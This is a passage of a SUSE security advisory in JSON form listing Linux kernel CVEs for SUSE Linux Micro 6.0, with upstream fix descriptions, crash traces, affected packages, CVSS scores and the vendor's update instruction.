"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40219"
},
{
"cve": "CVE-2025-40220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40220"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix livelock in synchronous file put from fuseblk workers\n\nI observed a hang when running generic/323 against a fuseblk server.\nThis test opens a file, initiates a lot of AIO writes to that file\ndescriptor, and closes the file descriptor before the writes complete.\nUnsurprisingly, the AIO exerciser threads are mostly stuck waiting for\nresponses from the fuseblk server:\n\n# cat /proc/372265/task/372313/stack\n[\u003c0\u003e] request_wait_answer+0x1fe/0x2a0 [fuse]\n[\u003c0\u003e] __fuse_simple_request+0xd3/0x2b0 [fuse]\n[\u003c0\u003e] fuse_do_getattr+0xfc/0x1f0 [fuse]\n[\u003c0\u003e] fuse_file_read_iter+0xbe/0x1c0 [fuse]\n[\u003c0\u003e] aio_read+0x130/0x1e0\n[\u003c0\u003e] io_submit_one+0x542/0x860\n[\u003c0\u003e] __x64_sys_io_submit+0x98/0x1a0\n[\u003c0\u003e] do_syscall_64+0x37/0xf0\n[\u003c0\u003e] entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nBut the /weird/ part is that the fuseblk server threads are waiting for\nresponses from itself:\n\n# cat /proc/372210/task/372232/stack\n[\u003c0\u003e] request_wait_answer+0x1fe/0x2a0 [fuse]\n[\u003c0\u003e] __fuse_simple_request+0xd3/0x2b0 [fuse]\n[\u003c0\u003e] fuse_file_put+0x9a/0xd0 [fuse]\n[\u003c0\u003e] fuse_release+0x36/0x50 [fuse]\n[\u003c0\u003e] __fput+0xec/0x2b0\n[\u003c0\u003e] task_work_run+0x55/0x90\n[\u003c0\u003e] syscall_exit_to_user_mode+0xe9/0x100\n[\u003c0\u003e] do_syscall_64+0x43/0xf0\n[\u003c0\u003e] entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nThe fuseblk server is fuse2fs so there\u0027s nothing all that exciting in\nthe server itself. So why is the fuse server calling fuse_file_put?\nThe commit message for the fstest sheds some light on that:\n\n\"By closing the file descriptor before calling io_destroy, you pretty\nmuch guarantee that the last put on the ioctx will be done in interrupt\ncontext (during I/O completion).\n\nAha. AIO fgets a new struct file from the fd when it queues the ioctx.\nThe completion of the FUSE_WRITE command from userspace causes the fuse\nserver to call the AIO completion function. The completion puts the\nstruct file, queuing a delayed fput to the fuse server task. When the\nfuse server task returns to userspace, it has to run the delayed fput,\nwhich in the case of a fuseblk server, it does synchronously.\n\nSending the FUSE_RELEASE command sychronously from fuse server threads\nis a bad idea because a client program can initiate enough simultaneous\nAIOs such that all the fuse server threads end up in delayed_fput, and\nnow there aren\u0027t any threads left to handle the queued fuse commands.\n\nFix this by only using asynchronous fputs when closing files, and leave\na comment explaining why.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40220",
"url": "https://www.suse.com/security/cve/CVE-2025-40220"
},
{
"category": "external",
"summary": "SUSE Bug 1254520 for CVE-2025-40220",
"url": "https://bugzilla.suse.com/1254520"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40220"
},
{
"cve": "CVE-2025-40223",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40223"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: Fix use-after-free in hdm_disconnect\n\nhdm_disconnect() calls most_deregister_interface(), which eventually\nunregisters the MOST interface device with device_unregister(iface-\u003edev).\nIf that drops the last reference, the device core may call release_mdev()\nimmediately while hdm_disconnect() is still executing.\n\nThe old code also freed several mdev-owned allocations in\nhdm_disconnect() and then performed additional put_device() calls.\nDepending on refcount order, this could lead to use-after-free or\ndouble-free when release_mdev() ran (or when unregister paths also\nperformed puts).\n\nFix by moving the frees of mdev-owned allocations into release_mdev(),\nso they happen exactly once when the device is truly released, and by\ndropping the extra put_device() calls in hdm_disconnect() that are\nredundant after device_unregister() and most_deregister_interface().\n\nThis addresses the KASAN slab-use-after-free reported by syzbot in\nhdm_disconnect(). See report and stack traces in the bug link below.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40223",
"url": "https://www.suse.com/security/cve/CVE-2025-40223"
},
{
"category": "external",
"summary": "SUSE Bug 1254957 for CVE-2025-40223",
"url": "https://bugzilla.suse.com/1254957"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40223"
},
{
"cve": "CVE-2025-40231",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40231"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock: fix lock inversion in vsock_assign_transport()\n\nSyzbot reported a potential lock inversion deadlock between\nvsock_register_mutex and sk_lock-AF_VSOCK when vsock_linger() is called.\n\nThe issue was introduced by commit 687aa0c5581b (\"vsock: Fix\ntransport_* TOCTOU\") which added vsock_register_mutex locking in\nvsock_assign_transport() around the transport-\u003erelease() call, that can\ncall vsock_linger(). vsock_assign_transport() can be called with sk_lock\nheld. vsock_linger() calls sk_wait_event() that temporarily releases and\nre-acquires sk_lock. During this window, if another thread hold\nvsock_register_mutex while trying to acquire sk_lock, a circular\ndependency is created.\n\nFix this by releasing vsock_register_mutex before calling\ntransport-\u003erelease() and vsock_deassign_transport(). This is safe\nbecause we don\u0027t need to hold vsock_register_mutex while releasing the\nold transport, and we ensure the new transport won\u0027t disappear by\nobtaining a module reference first via try_module_get().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40231",
"url": "https://www.suse.com/security/cve/CVE-2025-40231"
},
{
"category": "external",
"summary": "SUSE Bug 1254815 for CVE-2025-40231",
"url": "https://bugzilla.suse.com/1254815"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40231"
},
{
"cve": "CVE-2025-40233",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40233"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: clear extent cache after moving/defragmenting extents\n\nThe extent map cache can become stale when extents are moved or\ndefragmented, causing subsequent operations to see outdated extent flags. \nThis triggers a BUG_ON in ocfs2_refcount_cal_cow_clusters().\n\nThe problem occurs when:\n1. copy_file_range() creates a reflinked extent with OCFS2_EXT_REFCOUNTED\n2. ioctl(FITRIM) triggers ocfs2_move_extents()\n3. __ocfs2_move_extents_range() reads and caches the extent (flags=0x2)\n4. ocfs2_move_extent()/ocfs2_defrag_extent() calls __ocfs2_move_extent()\n which clears OCFS2_EXT_REFCOUNTED flag on disk (flags=0x0)\n5. The extent map cache is not invalidated after the move\n6. Later write() operations read stale cached flags (0x2) but disk has\n updated flags (0x0), causing a mismatch\n7. BUG_ON(!(rec-\u003ee_flags \u0026 OCFS2_EXT_REFCOUNTED)) triggers\n\nFix by clearing the extent map cache after each extent move/defrag\noperation in __ocfs2_move_extents_range(). This ensures subsequent\noperations read fresh extent data from disk.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40233",
"url": "https://www.suse.com/security/cve/CVE-2025-40233"
},
{
"category": "external",
"summary": "SUSE Bug 1254813 for CVE-2025-40233",
"url": "https://bugzilla.suse.com/1254813"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40233"
},
{
"cve": "CVE-2025-40238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix IPsec cleanup over MPV device\n\nWhen we do mlx5e_detach_netdev() we eventually disable blocking events\nnotifier, among those events are IPsec MPV events from IB to core.\n\nSo before disabling those blocking events, make sure to also unregister\nthe devcom device and mark all this device operations as complete,\nin order to prevent the other device from using invalid netdev\nduring future devcom events which could cause the trace below.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000010\nPGD 146427067 P4D 146427067 PUD 146488067 PMD 0\nOops: Oops: 0000 [#1] SMP\nCPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1\nTainted: [W]=WARN\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\nRIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\nCode: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 \u003c48\u003e 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40\nRSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206\nRAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00\nRDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000\nR10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600\nR13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80\nFS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x20/0x60\n ? page_fault_oops+0x150/0x3e0\n ? exc_page_fault+0x74/0x130\n ? asm_exc_page_fault+0x22/0x30\n ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\n mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core]\n mlx5_devcom_send_event+0x8c/0x170 [mlx5_core]\n blocking_event+0x17b/0x230 [mlx5_core]\n notifier_call_chain+0x35/0xa0\n blocking_notifier_call_chain+0x3d/0x60\n mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core]\n mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core]\n mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib]\n mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib]\n ? idr_alloc_cyclic+0x50/0xb0\n ? __kmalloc_cache_noprof+0x167/0x340\n ? __kmalloc_noprof+0x1a7/0x430\n __mlx5_ib_add+0x34/0xd0 [mlx5_ib]\n mlx5r_probe+0xe9/0x310 [mlx5_ib]\n ? kernfs_add_one+0x107/0x150\n ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib]\n auxiliary_bus_probe+0x3e/0x90\n really_probe+0xc5/0x3a0\n ? driver_probe_device+0x90/0x90\n __driver_probe_device+0x80/0x160\n driver_probe_device+0x1e/0x90\n __device_attach_driver+0x7d/0x100\n bus_for_each_drv+0x80/0xd0\n __device_attach+0xbc/0x1f0\n bus_probe_device+0x86/0xa0\n device_add+0x62d/0x830\n __auxiliary_device_add+0x3b/0xa0\n ? auxiliary_device_init+0x41/0x90\n add_adev+0xd1/0x150 [mlx5_core]\n mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core]\n esw_mode_change+0x6c/0xc0 [mlx5_core]\n mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core]\n devlink_nl_eswitch_set_doit+0x60/0xe0\n genl_family_rcv_msg_doit+0xd0/0x120\n genl_rcv_msg+0x180/0x2b0\n ? devlink_get_from_attrs_lock+0x170/0x170\n ? devlink_nl_eswitch_get_doit+0x290/0x290\n ? devlink_nl_pre_doit_port_optional+0x50/0x50\n ? genl_family_rcv_msg_dumpit+0xf0/0xf0\n netlink_rcv_skb+0x54/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x1fc/0x2d0\n netlink_sendmsg+0x1e4/0x410\n __sock_sendmsg+0x38/0x60\n ? sockfd_lookup_light+0x12/0x60\n __sys_sendto+0x105/0x160\n ? __sys_recvmsg+0x4e/0x90\n __x64_sys_sendto+0x20/0x30\n do_syscall_64+0x4c/0x100\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f27bc91b13a\nCode: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40238",
"url": "https://www.suse.com/security/cve/CVE-2025-40238"
},
{
"category": "external",
"summary": "SUSE Bug 1254871 for CVE-2025-40238",
"url": "https://bugzilla.suse.com/1254871"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40238"
},
{
"cve": "CVE-2025-40240",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40240"
}
],
"notes": [
{
"category": "general",
